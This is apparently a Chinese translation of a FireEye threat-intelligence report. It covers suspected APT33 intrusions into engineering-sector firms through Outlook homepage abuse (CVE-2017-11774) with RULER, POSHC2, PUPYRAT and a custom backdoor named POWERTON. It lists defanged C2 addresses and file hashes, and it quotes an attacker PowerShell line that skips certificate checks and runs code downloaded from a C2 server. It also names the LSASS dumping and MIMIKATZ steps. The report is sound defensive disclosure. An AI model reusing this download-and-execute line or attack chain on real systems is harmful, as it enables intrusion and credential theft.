FireEye评估APT33可能是工程行业内一系列入侵和企图入侵的幕后推手。公开报告表明此活动可能与最近的破坏性攻击SHAMOON有关。FireEye的 Managed Defense 已经响应并包括了我们评估的许多相关入侵。该攻击者在入侵的早期阶段利用公开可用的工具。然而,我们观察到它们在后期活动中转换为定制植入程序试图绕过检测。
2017年9月20日,FireEye Intelligence发布了一篇文章,详细介绍了针对能源和航空航天业的鱼叉式网络钓鱼活动。最近的公开报告表明,APT33鱼叉式网络钓鱼与SHAMOON攻击之间可能存在联系;但是,我们无法独立核实。FireEye的高级实践团队利用遥测和积极的主动操作来保持APT33的可见性。这些努力使我们能够建立一个操作时间表,该操作时间表与在攻击者完成任务之前确定并包含的多个入侵管理防御一致。我们使用下面描述的内部开发的相似性引擎来关联入侵。此外,公开讨论还表明,我们观察到的特定攻击者基础设施可能与最近的SHAMOON攻击有关。
45 days ago, during 24×7 monitoring, #ManagedDefense detected & contained an attempted intrusion from newly-identified adversary infrastructure*.
It is C2 for a code family we track as POWERTON.
*hxxps://103.236.149[.]100/api/info― FireEye (@FireEye) December 15, 2018
二、识别威胁行为中的重叠FireEye应用自身的专业知识和内部开发的相似性引擎,来评估组织和行动之间的潜在关联和关系。使用文档聚类和主题建模的概念,该引擎提供了一个框架,用于计算和发现活动组织之间的相似性,为后续分析提供调查线索。我们的引擎确定了工程行业内一系列入侵之间的相似之处。近乎实时的结果有助于深入的比较分析。FireEye分析了来自众多入侵和已知APT33活动的所有可用有机信息。随后我们以中等信心得出结论,两个特定的早期阶段入侵系同一组织行为。之后,高级实践团队基于去年观察到的确认的APT33活动重建了操作时间表。我们将其与所包含的入侵的时间线进行了比较,并确定在规定的时间范围内,在工具选择中包含很明显的相似性。我们低等信心地评估入侵是由APT33进行的。此博客仅包含原始源材料,而包含全源分析的Finished Intelligence可在我们的门户网站中找到。为了更好的理解对手使用的技术,有必要在24×7全天候监控期间提供有关此活动的Managed Defense响应的背景信息。
三、Managed Defense快速反应:调查攻击者 2017年11月中旬,Managed Defense确定并响应了针对工程行业客户的威胁活动。攻击者利用窃取的凭据和公开可用的工具――SensePost的 RULER 来配置客户端邮件规则,旨在从自己控制的WebDAV服务器85.206.161[.][emailprotected]\outlook\live.exe(MD5:95f3bea43338addc1ad951cd2d42eb6f)下载并执行恶意载荷。 有效载荷是一个AutoIT下载程序,它从hxxps://85.206.161[.]216:8080/HomePage.htm获取并执行其他PowerShell。后续的PowerShell依据目标系统的架构,下载合适的PowerSploit变种(MD5:c326f156657d1c41a9c387415bf779d4或0564706ec38d15e981f71eaf474d0ab8),并反射加载PUPYRAT(MD5:94cd86a0a4d747472c2b3f1bc3279d77或17587668AC577FCE0B278420B8EB72AC)。该攻击者利用公开可用的CVE-2017-0213漏洞提升权限,公开可用的windows SysInternals PROCDUMP转储LSASS进程,以及公开提供的MIMIKATZ窃取其他凭据。Managed Defense有助于受害者控制入侵。FireEye收集了168个PUPYRAT样本进行比较。虽然导入哈希值(IMPHASH)不足以归因溯源,但我们发现,在指定的抽样中,攻击者的IMPHASH仅在六个样本中被发现,其中两个被确认属于在Managed Defense中观察到的威胁行为者,并且一个归于APT33。我们还确定APT33可能在此期限内从PowerShell EMPIRE过渡到PUPYRAT。
在2018年7月中旬,Managed Defense确定了针对同一行业的类似针对性威胁活动。该攻击者利用窃取的凭据和利用CVE-2017-11774(RULER.HOMEPAGE)漏洞的RULER模块,修改了众多用户的Outlook客户端主页,以实现代码执行和持久性。这些方法在本文“RULER In-The-Wild”章节中进一步探讨。
攻击者利用这种持久性机制来下载和执行公开可用的.NET POSHC2后门的OS依赖变体,以及一个新发现的基于PowerShell的植入程序POWERTON。Managed Defens迅速参与并成功控制了入侵。值得注意的是,Advanced Practices分别确定APT33至少从2018年7月2日开始使用POSHC2,并在2018年期间继续使用。
在7月的活动期间,Managed Defense观察了hxxp://91.235.116[.]212/index.html上托管的主页漏洞利用的三个变体。一个例子如图1所示。
图1:攻击者的主页利用(CVE-2017-11774)
每个漏洞利用程序中的主编码有效载荷使用WMIC进行系统分析,以确定适当的依赖于操作系统的POSHC2植入程序,并将名为“Media.ps1”的PowerShell脚本保存在用户的%LOCALAPPDATA%目录中(%LOCALAPPDATA%\MediaWs\Media.ps1),如图2所示。
图2:攻击者的“Media.ps1”脚本
“Media.ps1”的目的是解码并执行下载的二进制有效载荷,该有效载荷写入磁盘文件“C:\Users\Public\Downloads\log.dat”。在后续阶段,此PowerShell脚本将通过配置注册表Run键,在主机上维持持久性。
对“log.dat”有效载荷的分析确定它们是公开可用的POSHC2的变体,用于从硬编码的命令和控制(C2)地址下载和执行PowerShell有效载菏。这些特定的POSHC2样本在.NET框架上运行,并从Base64编码的字符串动态加载有效载荷。植入程序通过HTTP向C2服务器(hxxps://51.254.71[.]223/images/static/content/)发送侦察报告,之后的响应为PowerShell源代码。侦察报告包含以下信息:用户名和域名
计算机名CPU详细信息
当前exe的PID
配置C2服务器
C2消息使用硬编码密钥的AES加密,并使用Base64编码。正是这个POSHC2二进制文件为前面提到的“Media.ps1”PowerShell脚本建立了持久性,然后在系统启动时解码并执行POSHC2二进制文件。在2018年7月确定的活动期间,POSHC2变体的配置终止日期为2018年7月29日。
利用POSHC2下载并执行一个新的基于PowerShell的植入程序,命名为POWERTON(hxxps://185.161.209[.]172/api/info)。在此期间,攻击者在与POWERTON的互动方面取得了部分进展该攻击者能够下载名为“ClouldPackage.exe”的AutoIt二进制文件(MD5:46038aa5b21b940099b0db413fa62687)并建立持久性,这是通过POWERTON“persist”命令实现的。“ClouldPackage.exe”的唯一功能是执行以下PowerShell代码: [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')此代码的目的是从C2服务器获取“静默模式”POWERTON。请注意,攻击者使用强大的凭据保护其后续有效载荷。在此之后不久,Managed Defense遏制了入侵。
大约三周后,攻击者通过密码枚举成功的重建访问权限。Managed Defense立即确定了使用RULER部署恶意主页的攻击者在工作站上持续存在。他们对一些基础设施和工具进行了更改,包含额外的混淆层以规避检测。攻击者在新的C2服务器(hxxp://5.79.66[.]241/index.html)上托管他们的主页漏洞利用。在此期间,至少发现了三个“index.html”的新变种。其中两个变体包含编写的PowerShell代码,用于下载新的依赖于OS的.NET POSHC2的变体,如图3所示。
图3:特定操作系统的POSHC2下载器
图3显示攻击者进行了一些小的更改,例如编码PowerShell“DownloadString”命令并将生成的POSHC2和.ps1文件重命名保存在磁盘上。解码后,命令将尝试从另一个新的C2服务器(hxxp://103.236.149[.]124/delivered.dat)下载POSHC2二进制文件。为解码并执行POSHC2变体而释放的.ps1的文件名也更改为“Vision.ps1”。在2018年8月的活动期间,POSHC2变体配置的“终止日期”为2018年8月13日。请注意,POSHC2支持终止日期,以便随时间保护入侵,并且此功能内置于框架中。 再次,POSHC2用于下载POWERTON的新变种(MD5:c38069d0bc79acdc28af3820c1123e53),配置为与C2域名hxxps://basepack[.]org通信。在8月下旬的某个时刻,在POSHC2终止日期之后,攻击使用RULER.HOMEPAGE直接下载POWERTON,绕过先前观察到的中间阶段。由于Managed Defense对这些入侵的早期遏制,我们无法确定攻击者的动机;但很明显,他们强烈要求获得并维持对受害者网络的访问。
四、基础设施监控 高级实践团队进行积极主动的操作,以便大规模地识别和监控攻击者基础设施。2018年7月16日至10月11日期间,攻击者在hxxp://91.235.116[.]212/index.html维持RULER.HOMEPAGE有效载荷。至少在2018年10月11日,攻击者改变了有效载荷(MD5) :8be06571e915ae3f76901d52068e3498),该有效载荷从hxxps://103.236.149[.]100/api/info(MD5:4047e238bbcec147f8b97d849ef40ce5)下载并执行POWERTON样本。此特定的URL在公开讨论中被识别为可能与最近的破坏性攻击有关。我们无法用拥有的任何有机信息独立验证此相关性。 在2018年12月13日,Advanced Practices主动识别并归因hxxp://89.45.35[.]235/index.html(MD5:f0fe6e9dde998907af76d91ba8f68a05)上托管的恶意RULER.HOMEPAGE有效载荷。此有效载荷用于下载和执行托管在hxxps://staffmusic[.]org/transfer/view(MD5:53ae59ed03fa5df3bf738bc0775a91d9)的POWERTON。表1包含我们所分析活动的操作时间表。
表1: 操作时间线
五、展望和启示如果在这些入侵期间观察到的活动与APT33相关联,则表明APT33可能保留了我们之前未曾观察到的专有能力,直到来自Managed Defense的持续压力迫使其使用。FireEye Intelligence此前曾报道,APT33与破坏性恶意软件有关,它们对关键基础设施构成了更大的风险。这种风险在能源部门是显而易见的,我们一直监测它们的目标。该目标与伊朗国家经济增长优势和竞争优势相一致,特别是与石化生产有关。
我们将继续独立跟踪这些组织,直到我们确信它们是相同的。除了根据需要的专有植入程序之外,所描述的每个入侵背后的操作者都使用了公众可获得但未广泛理解的工具和技术。Managed Defense有权每天在各种行业和对手中接触入侵活动。这一日常的前线体验得到了高级实践团队,FireEye实验室高级逆向工程(FLARE)和FireEye Intelligence的支持,为我们的客户提供了他们可以对付复杂对手的所有方法。我们欢迎其他原始来源信息,以确认或驳斥我们的分析判断。
六、定制化后门: POWERTONPOWERTON是一个用PowerShell编写的后门程序; FireEye尚未发现任何具有类似代码库的公开工具集,表明它可能是定制的。POWERTON旨在支持多种持久性机制,包括WMI和自动运行注册表项。与C2的通信是通过TCP / HTTP(S)进行的,并利用AES加密与C2之间的通信流量。POWERTON通常作为后期后门进行部署,并使用多层混淆处理。
FireEye观测到了至少两个独立版本的POWERTON,分别为POWERTON.v1和POWERTON.v2,并进行了跟踪,其中后者改进了其命令和控制功能,并集成了转储密码哈希的功能。
表2包含POWERTON的样本。
表2: POWERTON 恶意软件样本
七、攻击方法:崛起的电子邮件利用Outlook和Exchange无处不在。用户便利性是技术进步背后的主要驱动力,但用户的便捷访问通常会为攻击者提供额外的攻击面。随着机构在公共互联网向其用户开放电子邮件服务器的访问,使其成为入侵媒介。FireEye观察到攻击的增加对Exchange和Office365的安全控制提出了挑战和颠覆。在2018年FireEye网络防御峰会,我们的Mandiant顾问还提供了几种攻击者使用的新方法,用于破坏多因素身份验证。
在FireEye,我们的决策是数据驱动的,但提供给我们的数据通常是不完整的,必须根据我们的专业知识推断缺失的部分,以便我们有效地应对入侵。利用的合理方案如下。
攻击者通过任何方式收集机构为用户提供的一对有效凭据,以下并非所有详尽示例:
第三方泄露中的用户重复使用凭据;企业是否使用电子邮件地址的命名标准,例如[emailprotected]?企业内的用户可能拥有个人电子邮件地址,其姓名和附属密码在某个地方的第三方泄露中受到了侵害。他们重新使用了那个密码吗?在之前的入侵中,凭据已被泄露但未被识别或重置。
弱口令或密码安全策略导致暴力破解凭据。
从各种其他来源收集可破解的密码哈希值,例如通过用于进行网络钓鱼的文档收集的用户NTLM哈希值
